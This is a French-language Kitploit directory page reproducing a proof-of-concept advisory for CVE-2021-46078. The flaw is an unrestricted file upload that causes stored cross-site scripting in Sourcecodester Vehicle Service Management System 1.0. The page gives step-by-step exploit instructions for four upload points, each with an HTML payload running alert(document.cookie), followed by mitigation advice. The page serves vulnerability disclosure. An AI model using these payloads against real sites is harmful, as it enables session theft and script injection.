Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-46078 — CVE-2021-46078 - An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to a Stored Cross-Site Scripting vulnerability. | Kitploit
Outils/GitHubGitHub/sanupl/cve-2021-46078
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubsanupl/cve-2021-46078

CVE-2021-46078

CVE-2021-46078 - An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to a Stored Cross-Site Scripting vulnerability.

Voir le dépôt
1il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-46078

Titre de l'exploit : Vehicle Service Management System - 'Multiple' téléchargement de fichiers menant à un Cross-Site Scripting stocké

Auteur de l'exploit : SANU P.L

CVE: CVE-2021-46078

CVSS: 4.8 MOYEN

Références:

  • https://www.plsanu.com/vehicle-service-management-system-multiple-file-upload-leads-to-stored-cross-site-scripting
  • https://nvd.nist.gov/vuln/detail/CVE-2021-46078
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46078

Description:

Une vulnérabilité de téléchargement de fichiers sans restriction existe dans Sourcecodester Vehicle Service Management System 1.0. Un attaquant distant peut télécharger des fichiers malveillants menant à une vulnérabilité de Cross-Site Scripting stocké.

1. Vehicle Service Management System - 'MyAccount' (/admin/?page=user)

Exploit:

  1. Connectez-vous au panneau d'administration http://localhost/vehicle_service/admin
  2. Accédez à la section My Account http://localhost/vehicle_service/admin/?page=user

Payload:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. Enregistrez le code html ci-dessus, par exemple : XSS.html
  2. Dans la section My Account, saisissez tous les détails requis et parcourez le fichier html dans Avatar.
  3. Cliquez sur le bouton Update.
  4. Ouvrez l'image de l'avatar dans un nouvel onglet.
  5. Le code javascript malveillant est déclenché.

2. Vehicle Service Management System - 'User List' (/admin/?page=user/manage_user)

Exploit:

  1. Connectez-vous au panneau d'administration http://localhost/vehicle_service/admin
  2. Accédez à la section User List et cliquez sur le bouton Create New.

Payload:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. Enregistrez le code html ci-dessus, par exemple : XSS.html
  2. Dans la page Create New User, saisissez tous les détails requis et parcourez le fichier html dans Avatar.
  3. Cliquez sur le bouton Save.
  4. Ouvrez l'image de l'avatar dans un nouvel onglet.
  5. Le code javascript malveillant est déclenché.

3. Vehicle Service Management System - 'Paramètres - Logo du système' (/admin/?page=system_info)

Exploit:

  1. Connectez-vous au panneau d'administration http://localhost/vehicle_service/admin
  2. Accédez à la section Paramètres http://localhost/vehicle_service/admin/?page=system_info

Payload:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. Enregistrez le code html ci-dessus, par exemple : XSS.html
  2. Dans la section Paramètres, saisissez tous les détails requis et parcourez le fichier html dans Logo du système.
  3. Cliquez sur le bouton Update.
  4. Ouvrez l'image du Logo du système dans un nouvel onglet.
  5. Le code javascript malveillant est déclenché.

4. Vehicle Service Management System - 'Paramètres - Couverture du site Web' (/admin/?page=system_info)

Exploit:

  1. Connectez-vous au panneau d'administration http://localhost/vehicle_service/admin
  2. Accédez à la section Paramètres http://localhost/vehicle_service/admin/?page=system_info

Payload:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. Enregistrez le code html ci-dessus, par exemple : XSS.html
  2. Dans la section Paramètres, saisissez tous les détails requis et parcourez le fichier html dans Couverture du site Web.
  3. Cliquez sur le bouton Update.
  4. Ouvrez l'image de la Couverture du site Web dans un nouvel onglet.
  5. Le code javascript malveillant est déclenché.

Impact:

Un attaquant peut télécharger un fichier malveillant sur plusieurs points de terminaison, ce qui conduit à un Cross-Site Scripting stocké.

Atténuation:

Il est recommandé de mettre en œuvre les mesures suivantes :

  • N'acceptez jamais un nom de fichier et son extension directement sans avoir un filtre de liste blanche.
  • S'il n'est pas nécessaire d'avoir des caractères Unicode, il est fortement recommandé de n'accepter que des caractères alphanumériques et un seul point comme entrée pour le nom de fichier et l'extension.
  • Limitez la taille du fichier à une valeur maximale afin d'empêcher les attaques par déni de service.
  • Le répertoire de téléchargement ne doit avoir aucune permission "exécution".
  • Ne vous fiez pas uniquement à la validation côté client.
Télécharger l’outil